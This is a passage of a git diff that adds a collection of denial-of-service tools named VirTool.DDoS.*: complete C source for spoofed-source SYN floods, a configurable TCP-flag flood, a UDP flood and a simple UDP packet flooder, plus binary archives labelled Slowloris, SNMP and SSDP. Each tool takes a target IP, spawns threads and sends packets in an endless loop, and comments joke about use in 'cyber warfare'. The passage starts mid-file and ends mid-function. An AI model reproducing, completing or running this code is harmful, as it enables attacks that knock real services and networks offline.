+	for(i = 0;i<num_threads;i++){
+		pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+	}
+	fprintf(stdout, "Starting Flood...\n");
+	for(i = 0;i<(atoi(argv[4])*multiplier);i++)
+	{
+		usleep((1000/multiplier)*1000);
+		if((pps*multiplier) > maxpps)
+		{
+			if(1 > limiter)
+			{
+				sleeptime+=100;
+			} else {
+				limiter--;
+			}
+		} else {
+			limiter++;
+			if(sleeptime > 25)
+			{
+				sleeptime-=25;
+			} else {
+				sleeptime = 0;
+			}
+		}
+		pps = 0;
+	}
+
+	return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.SENTINEL.7z b/libs/VirTool.DDoS.SENTINEL.7z
new file mode 100644
index 00000000..1218a4e4
Binary files /dev/null and b/libs/VirTool.DDoS.SENTINEL.7z differ
diff --git a/libs/VirTool.DDoS.SLOWLORIS.a b/libs/VirTool.DDoS.SLOWLORIS.a
new file mode 100644
index 00000000..47dcf5c7
Binary files /dev/null and b/libs/VirTool.DDoS.SLOWLORIS.a differ
diff --git a/libs/VirTool.DDoS.SNMP.7z b/libs/VirTool.DDoS.SNMP.7z
new file mode 100644
index 00000000..732296d0
Binary files /dev/null and b/libs/VirTool.DDoS.SNMP.7z differ
diff --git a/libs/VirTool.DDoS.SSDP.7z b/libs/VirTool.DDoS.SSDP.7z
new file mode 100644
index 00000000..75ee5221
Binary files /dev/null and b/libs/VirTool.DDoS.SSDP.7z differ
diff --git a/libs/VirTool.DDoS.SSYN.a.c b/libs/VirTool.DDoS.SSYN.a.c
new file mode 100644
index 00000000..6e739764
--- /dev/null
+++ b/libs/VirTool.DDoS.SSYN.a.c
@@ -0,0 +1,217 @@
+// Improved SSYN Script - random ports, random flags. by SPAI3N.
+#include <pthread.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <time.h>
+#define MAX_PACKET_SIZE 4096
+#define PHI 0x9e3779b9
+static unsigned long int Q[4096], c = 362436;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+ 
+void init_rand(unsigned long int x)
+{
+		int i;
+		Q[0] = x;
+		Q[1] = x + PHI;
+		Q[2] = x + PHI + PHI;
+		for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+		unsigned long long int t, a = 18782LL;
+		static unsigned long int i = 4095;
+		unsigned long int x, r = 0xfffffffe;
+		i = (i + 1) & 4095;
+		t = a * Q[i] + c;
+		c = (t >> 32);
+		x = t + c;
+		if (x < c) {
+				x++;
+				c++;
+		}
+		return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+		register unsigned long sum = 0;
+		while( count > 1 ) { sum += *buf++; count -= 2; }
+		if(count > 0) { sum += *(unsigned char *)buf; }
+		while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+		return (unsigned short)(~sum);
+}
+ 
+unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
+ 
+		struct tcp_pseudo
+		{
+				unsigned long src_addr;
+				unsigned long dst_addr;
+				unsigned char zero;
+				unsigned char proto;
+				unsigned short length;
+		} pseudohead;
+		unsigned short total_len = iph->tot_len;
+		pseudohead.src_addr=iph->saddr;
+		pseudohead.dst_addr=iph->daddr;
+		pseudohead.zero=0;
+		pseudohead.proto=IPPROTO_TCP;
+		pseudohead.length=htons(sizeof(struct tcphdr));
+		int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
+		unsigned short *tcp = malloc(totaltcp_len);
+		memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
+		memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
+		unsigned short output = csum(tcp,totaltcp_len);
+		free(tcp);
+		return output;
+}
+ 
+void setup_ip_header(struct iphdr *iph)
+{
+		char ip[17];
+		snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
+		iph->ihl = 5;
+		iph->version = 4;
+		iph->tos = 0;
+		iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
+		iph->id = htonl(rand()%54321);
+		iph->frag_off = 0;
+		iph->ttl = MAXTTL;
+		iph->protocol = 6;
+		iph->check = 0;
+		iph->saddr = inet_addr(ip);
+}
+ 
+void setup_tcp_header(struct tcphdr *tcph)
+{
+		tcph->source = htons(rand()%65535);
+		tcph->seq = rand();
+		tcph->ack_seq = 0;
+		tcph->res1 = 0;
+		tcph->res2 = 0;
+		tcph->doff = 5;
+		tcph->psh = 0;
+		tcph->syn = 1;
+		tcph->window = htons(65535);
+		tcph->check = 0;
+		tcph->urg_ptr = 0;
+}
+ 
+void *flood(void *par1)
+{
+	char *td = (char *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
+   
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_port = htons(rand()%54321);
+	sin.sin_addr.s_addr = inet_addr(td);
+
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+			fprintf(stderr, "Could not open raw socket.\n");
+			exit(-1);
+	}
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_tcp_header(tcph);
+	tcph->dest = htons(rand()%54321);
+	iph->daddr = sin.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+			fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+			exit(-1);
+	}
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	int psh = 0;
+	int res1 = 0;
+	int res2 = 0;
+	while(1)
+	{
+		if(psh > 1) psh = 1;
+		if(res1 > 4) res1 = 0;
+		if(res2 > 3) res2 = 0;
+		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+		setup_ip_header(iph);
+		setup_tcp_header(tcph);
+		iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+		tcph->dest = htons(rand()%65535);
+		iph->daddr = sin.sin_addr.s_addr;
+		iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+		tcph->seq = rand_cmwc() & 0xFFFF;
+		tcph->source = htons(rand_cmwc() & 0xFFFF);
+		tcph->ack_seq = 1;
+		tcph->psh = psh;
+		tcph->res1 = res1;
+		tcph->res2 = res2;
+		tcph->check = 0;
+		tcph->check = tcpcsum(iph, tcph);
+		pps++;
+		psh++;
+		res1++;
+		res2++;
+		if(i >= limiter)
+		{
+				i = 0;
+				usleep(sleeptime);
+		}
+		i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+		if(argc < 5){
+				fprintf(stdout, "ISSYN v1.0 - Improved by Spai3N\nInvalid parameters!\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+				exit(-1);
+		}
+		srand(time(0)); 
+		int num_threads = atoi(argv[2]);
+		int maxpps = atoi(argv[3]);
+		limiter = 0;
+		pps = 0;
+		pthread_t thread[num_threads];  
+		int multiplier = 20;
+		int i;
+		fprintf(stderr, "Start flooding ...\n", argv[1]);
+		for(i = 0;i<num_threads;i++){
+				pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+		}
+		fprintf(stderr, "Flooding: %s\n", argv[1]);
+		for(i = 0;i<(atoi(argv[4])*multiplier);i++)
+		{
+				usleep((1000/multiplier)*1000);
+				if((pps*multiplier) > maxpps)
+				{
+						if(1 > limiter)
+						{
+								sleeptime+=100;
+						} else {
+								limiter--;
+						}
+				} else {
+						limiter++;
+						if(sleeptime > 25)
+						{
+								sleeptime-=25;
+						} else {
+								sleeptime = 0;
+						}
+				}
+				pps = 0;
+		}
+ 
+		return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.SSYN.b.c b/libs/VirTool.DDoS.SSYN.b.c
new file mode 100644
index 00000000..0ac705ff
--- /dev/null
+++ b/libs/VirTool.DDoS.SSYN.b.c
@@ -0,0 +1,201 @@
+/*
+ * This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
+ */
+#include <unistd.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <netinet/tcp.h>
+#include <netinet/ip.h>
+#include <netinet/in.h>
+#include <netinet/if_ether.h>
+#include <netdb.h>
+#include <net/if.h>
+#include <arpa/inet.h>
+#define MAX_PACKET_SIZE 4096
+#define PHI 0x9e3779b9
+static unsigned long int Q[4096], c = 362436;
+static unsigned int floodport;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+void init_rand(unsigned long int x)
+{
+	int i;
+	Q[0] = x;
+	Q[1] = x + PHI;
+	Q[2] = x + PHI + PHI;
+	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+	unsigned long long int t, a = 18782LL;
+	static unsigned long int i = 4095;
+	unsigned long int x, r = 0xfffffffe;
+	i = (i + 1) & 4095;
+	t = a * Q[i] + c;
+	c = (t >> 32);
+	x = t + c;
+	if (x < c) {
+	x++;
+	c++;
+	}
+	return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+	register unsigned long sum = 0;
+	while( count > 1 ) { sum += *buf++; count -= 2; }
+	if(count > 0) { sum += *(unsigned char *)buf; }
+	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+	return (unsigned short)(~sum);
+}
+unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
+	struct tcp_pseudo
+	{
+	unsigned long src_addr;
+	unsigned long dst_addr;
+	unsigned char zero;
+	unsigned char proto;
+	unsigned short length;
+	} pseudohead;
+	unsigned short total_len = iph->tot_len;
+	pseudohead.src_addr=iph->saddr;
+	pseudohead.dst_addr=iph->daddr;
+	pseudohead.zero=0;
+	pseudohead.proto=IPPROTO_TCP;
+	pseudohead.length=htons(sizeof(struct tcphdr));
+	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
+	unsigned short *tcp = malloc(totaltcp_len);
+	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
+	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
+	unsigned short output = csum(tcp,totaltcp_len);
+	free(tcp);
+	return output;
+}
+
+void setup_ip_header(struct iphdr *iph)
+{
+	iph->ihl = 5;
+	iph->version = 4;
+	iph->tos = 0;
+	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
+	iph->id = htonl(54321);
+	iph->frag_off = 0;
+	iph->ttl = MAXTTL;
+	iph->protocol = 6;
+	iph->check = 0;
+	iph->saddr = inet_addr("192.168.3.100");
+}
+
+void setup_tcp_header(struct tcphdr *tcph)
+{
+	tcph->source = htons(5678);
+	tcph->seq = rand();
+	tcph->ack_seq = rand();
+	tcph->res2 = 0;
+	tcph->doff = 5;
+	tcph->syn = 1;
+	tcph->fin = 1;
+	tcph->window = rand();
+	tcph->check = 0;
+	tcph->urg_ptr = 0;
+}
+void *flood(void *par1)
+{
+	char *td = (char *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_port = htons(floodport);
+	sin.sin_addr.s_addr = inet_addr(td);
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+	fprintf(stderr, "Could not open raw socket.\n");
+	exit(-1);
+	}
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_tcp_header(tcph);
+	tcph->dest = htons(floodport);
+	iph->daddr = sin.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+	fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+	exit(-1);
+	}
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	while(1){
+	sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+	iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+	iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+	tcph->seq = rand_cmwc() & 0xFFFF;
+	tcph->source = htons(rand_cmwc() & 0xFFFF);
+	tcph->check = 0;
+	tcph->check = tcpcsum(iph, tcph);
+	pps++;
+	if(i >= limiter)
+	{
+	i = 0;
+	usleep(sleeptime);
+	}
+	i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+	if(argc < 6){
+	fprintf(stderr, "Invalid parameters!\n");
+	fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+	exit(-1);
+	}
+	fprintf(stdout, "Setting up Sockets...\n");
+	int num_threads = atoi(argv[3]);
+	floodport = atoi(argv[2]);
+	int maxpps = atoi(argv[4]);
+	limiter = 0;
+	pps = 0;
+	pthread_t thread[num_threads];
+	int multiplier = 20;
+	int i;
+	for(i = 0;i<num_threads;i++){
+	pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+	}
+	fprintf(stdout, "Starting Flood...\n");
+	for(i = 0;i<(atoi(argv[5])*multiplier);i++)
+	{
+		usleep((1000/multiplier)*1000);
+		if((pps*multiplier) > maxpps)
+		{
+			if(1 > limiter)
+			{
+				sleeptime+=100;
+			} else {
+				limiter--;
+			}
+		} else {
+			limiter++;
+			if(sleeptime > 25)
+			{
+				sleeptime-=25;
+			} else {
+				sleeptime = 0;
+			}
+		}
+		pps = 0;
+	}
+
+	return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.STCP.c b/libs/VirTool.DDoS.STCP.c
new file mode 100644
index 00000000..f5e46f0a
--- /dev/null
+++ b/libs/VirTool.DDoS.STCP.c
@@ -0,0 +1,269 @@
+/* STCP - AnonnPL, look at TeamSpeakCrack.com  */
+#include <unistd.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <netinet/tcp.h>
+#include <netinet/ip.h>
+#include <netinet/in.h>
+#include <netinet/if_ether.h>
+#include <netdb.h>
+#include <net/if.h>
+#include <arpa/inet.h>
+
+#define MAX_PACKET_SIZE 4096
+#define PHI 0x9e3779b9
+
+static unsigned long int Q[4096], c = 362436;
+static unsigned int floodport;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+int ack,syn,psh,fin,rst,urg,ptr,res2,seq;
+
+void init_rand(unsigned long int x)
+{
+	int i;
+	Q[0] = x;
+	Q[1] = x + PHI;
+	Q[2] = x + PHI + PHI;
+	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+	unsigned long long int t, a = 18782LL;
+	static unsigned long int i = 4095;
+	unsigned long int x, r = 0xfffffffe;
+	i = (i + 1) & 4095;
+	t = a * Q[i] + c;
+	c = (t >> 32);
+	x = t + c;
+	if (x < c) {
+		x++;
+		c++;
+	}
+	return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+	register unsigned long sum = 0;
+	while( count > 1 ) { sum += *buf++; count -= 2; }
+	if(count > 0) { sum += *(unsigned char *)buf; }
+	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+	return (unsigned short)(~sum);
+}
+
+unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
+
+	struct tcp_pseudo
+	{
+		unsigned long src_addr;
+		unsigned long dst_addr;
+		unsigned char zero;
+		unsigned char proto;
+		unsigned short length;
+	} pseudohead;
+	unsigned short total_len = iph->tot_len;
+	pseudohead.src_addr=iph->saddr;
+	pseudohead.dst_addr=iph->daddr;
+	pseudohead.zero=0;
+	pseudohead.proto=IPPROTO_TCP;
+	pseudohead.length=htons(sizeof(struct tcphdr));
+	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
+	unsigned short *tcp = malloc(totaltcp_len);
+	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
+	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
+	unsigned short output = csum(tcp,totaltcp_len);
+	free(tcp);
+	return output;
+}
+
+void setup_ip_header(struct iphdr *iph)
+{
+	iph->ihl = 5;
+	iph->version = 4;
+	iph->tos = 0;
+	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
+	iph->id = htonl(rand()%54321);
+	iph->frag_off = 0;
+	iph->ttl = MAXTTL;
+	iph->protocol = 6;
+	iph->check = 0;
+	iph->saddr = inet_addr("8.8.8.8");
+}
+
+void setup_tcp_header(struct tcphdr *tcph)
+{
+tcph->source = htons(rand()%65535);
+	tcph->seq = rand();
+	tcph->ack  = ack;
+	tcph->ack_seq = seq;
+	tcph->psh  = psh;	
+	tcph->fin  = fin;
+	tcph->rst  = rst;
+	tcph->res2 = res2;
+	tcph->doff = 5;
+	tcph->syn = syn; 
+	tcph->urg  = urg;
+	tcph->urg_ptr = ptr;
+	tcph->window = htonl(65535);
+	tcph->check = 0;
+}
+
+void *flood(void *par1)
+{
+	char *td = (char *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
+	
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_port = htons(floodport);
+	sin.sin_addr.s_addr = inet_addr(td);
+
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+		fprintf(stderr, "Could not open raw socket.\n");
+		exit(-1);
+	}
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_tcp_header(tcph);
+
+	tcph->dest = htons(floodport);
+
+	iph->daddr = sin.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+		fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+		exit(-1);
+	}
+
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	while(1){
+		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+
+		iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+		iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+		tcph->seq = rand_cmwc() & 0xFFFF;
+		tcph->source = htons(rand_cmwc() & 0xFFFF);
+		tcph->check = 0;
+		tcph->check = tcpcsum(iph, tcph);
+		
+		pps++;
+		if(i >= limiter)
+		{
+			i = 0;
+			usleep(sleeptime);
+		}
+		i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+	if(argc < 7){
+		fprintf(stderr, "Invalid parameters!\n");
+		fprintf(stdout, "Usage: %s <target IP> <port> <threads> <pps limiter, -1 for no limit> <time> <ack,syn,psh,fin,rst,urg,ptr,res2,seq>\n", argv[0]);
+		exit(-1);
+	}
+
+	fprintf(stdout, "Setting up Sockets...\n");
+
+	int num_threads = atoi(argv[3]);
+	floodport = atoi(argv[2]);
+	int maxpps = atoi(argv[4]);
+	limiter = 0;
+	pps = 0;
+	pthread_t thread[num_threads];
+//TCP FLAGS
+	if(strstr(argv[6], "ack"))
+	ack  = 1;
+	else
+	ack  = 0;
+	
+	if(strstr(argv[6], "seq"))
+	seq = 1;
+	else
+	seq = 0;
+	
+	if(strstr(argv[6], "psh"))
+	psh = 1;
+	else
+	psh = 0;
+	
+	if(strstr(argv[6], "fin"))
+	fin  = 1;
+	else
+	fin  = 0;
+	
+	if(strstr(argv[6], "rst"))
+	rst = 1;
+	else
+	rst = 0;
+	
+	if(strstr(argv[6], "res2"))
+	res2 = 1;
+	else
+	res2 = 0;
+	
+	if(strstr(argv[6], "syn"))
+	syn = 1;
+	else
+	syn = 0;
+	
+	if(strstr(argv[6], "urg"))
+	urg = 1;
+	else
+	urg = 0;
+	
+	if(strstr(argv[6], "ptr"))
+	ptr = 1;
+	else
+	ptr = 0;
+	
+//FLAGS END
+	int multiplier = 20;
+
+	int i;
+	for(i = 0;i<num_threads;i++){
+		pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+	}
+	fprintf(stdout, "Starting Flood...\n");
+	fprintf(stdout, "Code by Anonn\n");
+	for(i = 0;i<(atoi(argv[5])*multiplier);i++)
+	{
+		usleep((1000/multiplier)*1000);
+		if((pps*multiplier) > maxpps)
+		{
+			if(1 > limiter)
+			{
+				sleeptime+=100;
+			} else {
+				limiter--;
+			}
+		} else {
+			limiter++;
+			if(sleeptime > 25)
+			{
+				sleeptime-=25;
+			} else {
+				sleeptime = 0;
+			}
+		}
+		pps = 0;
+	}
+
+	return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.STD.c b/libs/VirTool.DDoS.STD.c
new file mode 100644
index 00000000..330dff94
--- /dev/null
+++ b/libs/VirTool.DDoS.STD.c
@@ -0,0 +1,49 @@
+/* STD.C By stackd - (root@stackd.net) Define strings to what you feel fit */
+
+#define STD2_STRING "std"
+#define STD2_SIZE 50
+ 
+#include <stdio.h>
+#include <sys/param.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <stdarg.h>
+ 
+int echo_connect(char *, short);
+ 
+int echo_connect(char *server, short port)
+{
+   struct sockaddr_in sin;
+   struct hostent *hp;
+   int thesock;
+   hp = gethostbyname(server);
+   if (hp==NULL) {
+      printf("Unknown host: %s\n",server);
+      exit(0);
+   }
+   printf(" STD.C -- Packeting %s:%d\n ", server, port);
+   bzero((char*) &sin,sizeof(sin));
+   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
+   sin.sin_family = hp->h_addrtype;
+   sin.sin_port = htons(port);
+   thesock = socket(AF_INET, SOCK_DGRAM, 0);
+   connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
+   return thesock;
+}
+ 
+ 
+main(int argc, char **argv)
+{
+   int s;
+   if(argc != 3)
+   {
+      fprintf(stderr, "[STD2.C BY STACKD] Syntax: %s host port\n",argv[0]);
+      exit(0);
+   }
+   s=echo_connect(argv[1], atoi(argv[2]));
+   for(;;)
+   {
+      send(s, STD2_STRING, STD2_SIZE, 0);
+   }
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.SUDP.c b/libs/VirTool.DDoS.SUDP.c
new file mode 100644
index 00000000..20d6d950
--- /dev/null
+++ b/libs/VirTool.DDoS.SUDP.c
@@ -0,0 +1,184 @@
+/*
+	This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
+*/
+#include <time.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/udp.h>
+#define MAX_PACKET_SIZE 4096
+#define PHI 0x9e3779b9
+static uint32_t Q[4096], c = 362436;
+struct thread_data{
+        int throttle;
+	int thread_id;
+	struct sockaddr_in sin;
+};
+void init_rand(uint32_t x)
+{
+        int i;
+        Q[0] = x;
+        Q[1] = x + PHI;
+        Q[2] = x + PHI + PHI;
+ 
+        for (i = 3; i < 4096; i++)
+                Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
+}
+uint32_t rand_cmwc(void)
+{
+        uint64_t t, a = 18782LL;
+        static uint32_t i = 4095;
+        uint32_t x, r = 0xfffffffe;
+        i = (i + 1) & 4095;
+        t = a * Q[i] + c;
+        c = (t >> 32);
+        x = t + c;
+        if (x < c) {
+                x++;
+                c++;
+        }
+        return (Q[i] = r - x);
+}
+char *myStrCat (char *s, char *a) {
+    while (*s != '\0') s++;
+    while (*a != '\0') *s++ = *a++;
+    *s = '\0';
+    return s;
+}
+char *replStr (char *str, size_t count) {
+    if (count == 0) return NULL;
+    char *ret = malloc (strlen (str) * count + count);
+    if (ret == NULL) return NULL;
+    *ret = '\0';
+    char *tmp = myStrCat (ret, str);
+    while (--count > 0) {
+        tmp = myStrCat (tmp, str);
+    }
+    return ret;
+}
+unsigned short csum (unsigned short *buf, int nwords)
+{
+  unsigned long sum;
+  for (sum = 0; nwords > 0; nwords--)
+  sum += *buf++;
+  sum = (sum >> 16) + (sum & 0xffff);
+  sum += (sum >> 16);
+  return (unsigned short)(~sum);
+}
+void setup_ip_header(struct iphdr *iph)
+{
+  iph->ihl = 5;
+  iph->version = 4;
+  iph->tos = 0;
+  iph->tot_len = sizeof(struct iphdr) + 1028;
+  iph->id = htonl(54321);
+  iph->frag_off = 0;
+  iph->ttl = MAXTTL;
+  iph->protocol = IPPROTO_UDP;
+  iph->check = 0;
+  iph->saddr = inet_addr("192.168.3.100");
+}
+void setup_udp_header(struct udphdr *udph)
+{
+  udph->source = htons(5678);
+  udph->check = 0;
+  char *data = (char *)udph + sizeof(struct udphdr);
+  data = replStr("\xFF" "\xFF" "\xFF" "\xFF", 256);
+  udph->len=htons(1028);
+}
+void *flood(void *par1)
+{
+  struct thread_data *td = (struct thread_data *)par1;
+  char datagram[MAX_PACKET_SIZE];
+  struct iphdr *iph = (struct iphdr *)datagram;
+  struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
+  struct sockaddr_in sin = td->sin;
+  char new_ip[sizeof "255.255.255.255"];
+  int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+  if(s < 0){
+    fprintf(stderr, "Could not open raw socket.\n");
+    exit(-1);
+  }
+  memset(datagram, 0, MAX_PACKET_SIZE);
+  setup_ip_header(iph);
+  setup_udp_header(udph);
+  udph->dest = htons (rand() % 20480);
+  iph->daddr = sin.sin_addr.s_addr;
+  iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
+  int tmp = 1;
+  const int *val = &tmp;
+  if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+    fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+    exit(-1);
+  }
+  int throttle = td->throttle;
+  uint32_t random_num;
+  uint32_t ul_dst;
+  init_rand(time(NULL));
+  if(throttle == 0){
+    while(1){
+      sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+      random_num = rand_cmwc();
+      ul_dst = (random_num >> 24 & 0xFF) << 24 |
+               (random_num >> 16 & 0xFF) << 16 |
+               (random_num >> 8 & 0xFF) << 8 |
+               (random_num & 0xFF);
+
+      iph->saddr = ul_dst;
+      udph->source = htons(random_num & 0xFFFF);
+      iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
+    }
+  } else {
+    while(1){
+      throttle = td->throttle;
+      sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+      random_num = rand_cmwc();
+      ul_dst = (random_num >> 24 & 0xFF) << 24 |
+               (random_num >> 16 & 0xFF) << 16 |
+               (random_num >> 8 & 0xFF) << 8 |
+               (random_num & 0xFF);
+
+      iph->saddr = ul_dst;
+      udph->source = htons(random_num & 0xFFFF);
+      iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
+     while(--throttle);
+    }
+  }
+}
+int main(int argc, char *argv[ ])
+{
+  if(argc < 4){
+    fprintf(stderr, "Invalid parameters!\n");
+    fprintf(stdout, "Usage: %s <IP> <throttle> <threads> <time>\n", argv[0]);
+    exit(-1);
+  }
+  fprintf(stdout, "Setting up Sockets...\n");
+  int num_threads = atoi(argv[3]);
+  pthread_t thread[num_threads];
+  struct sockaddr_in sin;
+  sin.sin_family = AF_INET;
+  sin.sin_port = htons (rand() % 20480);
+  sin.sin_addr.s_addr = inet_addr(argv[1]);
+  struct thread_data td[num_threads];
+  int i;
+  for(i = 0;i<num_threads;i++){
+    td[i].thread_id = i;
+    td[i].sin = sin;
+    td[i].throttle = atoi(argv[2]);
+    pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
+  }
+  fprintf(stdout, "Starting Flood...\n");
+  if(argc > 5)
+  {
